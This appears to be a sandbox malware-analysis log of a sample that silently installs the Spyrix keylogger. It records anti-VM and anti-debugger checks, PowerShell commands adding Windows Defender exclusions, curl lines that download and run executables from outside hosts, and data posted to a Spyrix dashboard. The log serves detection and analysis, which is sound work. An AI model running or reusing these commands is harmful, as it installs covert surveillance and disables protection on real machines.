Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040AC68 FindFirstFileW,FindClose,	53_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	53_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C75E8 FindFirstFileA,	53_2_033C75E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C76C4 FindFirstFileA,GetLastError,	53_2_033C76C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C60F2 GetSystemInfo,

53_2_033C60F2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Source: NETSTAT.EXE, 00000040.00000002.2593027427.00000000033CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: curl.exe, 0000000C.00000003.1788331941.0000000003291000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: svchost.exe, 00000007.00000002.2932740922.000002BE17659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2925637853.000002BE1202B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2925747202.000002BE12043000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: spkl.exe, 00000035.00000002.2958710472.000000000184E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: curl.exe, 0000000D.00000003.2045959683.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2045999780.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: spmm.exe, 00000049.00000002.2925038752.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli0Y
Source: curl.exe, 00000005.00000003.1700333845.000001295C1B6000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000006.00000002.1983125649.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715156517.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2766389640.0000000001798000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2745068935.0000000000C08000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768473168.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: spkl.exe, 00000035.00000002.2933829318.0000000001484000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@IdPORT_vmnet

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033EB8B0 rdtsc

53_2_033EB8B0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D1119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,

67_2_00D1119B

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "sem"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spkl"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "clv"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

Uses taskkill to terminate processes

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F

Source: spkl.exe, 00000035.00000002.2989667203.00000000086D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000450A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2977775602.0000000006621000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000035.00000003.2911483610.0000000007717000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:12:00.152{"sTime":"2024-10-02 00:12:00.152","sdTime":"45567.0083350926","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2971872040.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.0000000004556000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
